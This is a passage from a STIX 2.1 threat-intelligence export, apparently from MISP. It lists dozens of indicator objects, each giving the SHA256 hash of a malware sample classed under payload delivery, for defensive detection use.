"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fa9-6b14-4401-96bc-4811950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5faa-5608-420c-83ba-48e7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fac-f740-48a1-92e1-4457950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fac-4f58-4b74-ba5b-4528950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fad-0708-44cd-b7cd-4d47950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'd99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fae-f69c-485a-98ff-4945950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb0-7df8-453b-bfec-4770950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb0-d528-4d69-b25e-462c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb1-c30c-494e-a5c3-4dfe950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '3ffec5efb775c7d977f1e0ad1e8a51a111394e0ed113f58809fc8441b2c0f731']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb3-d000-4d27-bd68-41bb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '3d94881f0125093576dd01cd54cfd937cdca2b3050ad9aa4c5db2514d9aa686c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb4-9678-40ec-90ee-41f1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '1d06464bafd24c228fd66df9cbf8feceda1346cef8648c2cd87cf617547bbe1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb5-bad4-4a11-9dae-4550950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '9c403782571042fe2e3efb3acc35a26867956235a2a9472798bd664b65698c3a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb6-04e8-47c6-8e7e-45d5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'd0eaec396ae11110dc4f51f3340d4735790876510de438f8a161577c7aa72d1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb7-55a8-4897-8bce-4fe3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb8-3040-4381-85dc-4b0f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fb9-2410-4dc6-a3c3-49b2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fba-e40c-43d8-89ac-414b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbb-3694-4fa4-b961-4cd4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbc-5ed8-4934-9d8f-4596950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '67df79166bb258e77959c326c21563ea41f3f119d8e8486043efb83c868e636f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbd-245c-4ffb-b806-4d63950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '5661e7c23ed6058157b39ed29fa37690148d377b1faa7c7b89024daf0ef7e904']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbe-fb94-4c46-aaa0-44da950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'bbe7abc992928a45b618fbd7fbdd472ec3e4a47126f21ec38ad8257afe0c091f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbe-6fb4-40ce-aef2-4a83950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '05e30073cbd18b0ff2cfeab307e2e8cd2226d921a1872f17fcc312fc601fa93e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fbf-f974-4045-a7a6-4c32950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '4a25bf18783ad32e08aaff0707d8fdae88647da4e0bfd22d83850e0dfa4ab148']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc0-fcdc-4381-a664-47b1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '3109724914f0eec8ee5167b15e43fc71e58106983ad0d2137c96239d5b25ad7c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc1-5418-437c-a9c1-4fcc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'c333173687879f3a6387f5afd915d9a4f042ffeb96f4cdf4514a5433de558f6f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc2-177c-4b74-bc5c-46c6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc3-7a0c-4d59-adf0-4902950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'd884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc4-90a8-4c5c-951f-48a0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '3944c7586e17399051785e1ae0311f4b98e74825291249a784428a64a80240e5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc5-d168-4597-b703-4752950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'f76fe0b83e45a77ebc36ab12a27a5cf49be74fb154c51cb793e946c45bc4e12f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc7-c5e0-45b5-a2d7-4b72950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc8-5750-4b8a-9c23-42a0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fc9-def0-4086-9662-4870950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
